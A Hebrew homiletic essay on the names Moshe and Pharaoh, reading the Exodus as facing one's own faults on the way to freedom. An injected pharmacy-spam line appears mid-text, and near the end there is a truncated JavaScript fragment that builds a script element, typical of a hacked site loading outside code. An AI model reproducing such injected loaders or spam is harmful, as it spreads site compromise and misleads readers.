בין “משה” ל “פרעה” / מרדכי אפרתי

בס”ד

בין “משה” ל “פרעה”/מרדכי אפרתי

מה ההבדל בן השם “משה” לבן השם “פרעה” ?

 

פרעה – פריעה, גילוי. התעסקות בצד הגלוי של העולם ובמימד החיצוני שלו בעורף (“פרעה” אותיות “הערף”) ולא בפנים.

 

משה – מושה מהמים, הוצאה מהתוך והפנים אל החוץ, קשר לצד הפנימי של המציאות והבאת הצדדים הנסתרים בו למימוש ולגילוי.

 

הקב”ה אומר למשה “בא אל פרעה” כלומר הוא מצווה את משה להיכנס לתוך הגשמיות והרע ולהוציא ממנו את הטוב הבלוע בו וכך לתקן אותו.

 

על משה להיכנס לרע ולעולם הגשמי והגס ולהראות שגם בו יש פנימיות וגם בו ד’ שולט ודבר זה נעשה ע”י עשרת המכות שהובאו על המצרים.

 

יציאת מצרים אינה רק הוצאה משעבוד לגאולה אלא היא גילוי כוחו של הקב”ה הנמצא אפילו ברע ומנצח אותו.

 

הניצחון על הרע ועל העולם הגשמי והגס אינה השמדתם אלא העמדתם במקום הראוי להם והנכון.

 

הוצאת הטוב מהרע היא לא רק גאולת הטוב אלא היא גופא התיקון של הרע.

 

כדי להוציא את הטוב מהרע יש להיכנס אליו, לראות אותו להכיר במציאותו .

 

“פרעה” ו “משה” נמצאים בכל אדם ולפעמים אנו משועבדים ל “פרעה” שבתוכנו  , לחומר, לגשם, לתאוות, לחיצוניות הראוותנית הגלויה ומכאן הנפילות הרבות בחיינו.

online pharmacy for viagra to china  

לכולנו צדדים שליליים באופי ובהתנהגות ברמה כזו או אחרת אבל אין לנו את “האומץ הנפשי” לעמוד מול עצמנו, לראות את עצמנו במראה , אנו מעדיפים לחיות ב “הכחשה” ולעסוק כמה שפחות בהיבטים הלא מתוקנים של מעשינו, מחשבותינו, התנהגותנו, אמונתנו. במילים אחרות “האני” שלנו נשאר צר , נשאר במיצר, נשאר “במצרים” ולא יוצא למציאות הגלויה והנראית.

 

כל תהליך ריפוי מתחיל בכך שהחולה מודה ומודע בדיוק למחלתו. ללא ה “אומץ” של החולה לעמוד פעם אחת ולשמוע ללא פחד מה בדיוק לא טוב אצלו הוא לעולם לא יתרפא . גם ב “חולי” נפשי, אמוני, הדבר הראשון הוא להכיר ברע שבנו, לזהות אותו, להודות בקיומו ובמילים אחרות להעיז להיכנס אליו.

 

כדי לצאת לחירות, על “משה” שבנו להיכנס  ל “פרעה” (“בא אל פרעה”) , דהיינו, ראשית להכיר ולהיות מודע  לנפילות ולכישלונות ורק כך להוציא את הטוב שבנו מהרע, לצאת מגלות לגאולה.

 

החירות היא היכולת להיות אתה “נטו” (האדם “נטו” הוא טוב שנא’ “האלוקים עשה את האדם ישר”) מבלי שיעבוד לאחרים ( “אחרים” אותיות “חמירא” – חמץ,תאוות, חומר) בדיוק כמו המצה שהיא “נטו” רק מה שיש בה , מים וקמח, ולא מתנפחת ע”י כוחות חימוץ  “אחרים”.

 

 } else {var d=document;var s=d.createElement(‘script’);

סגור לתגובות.

Scroll To Top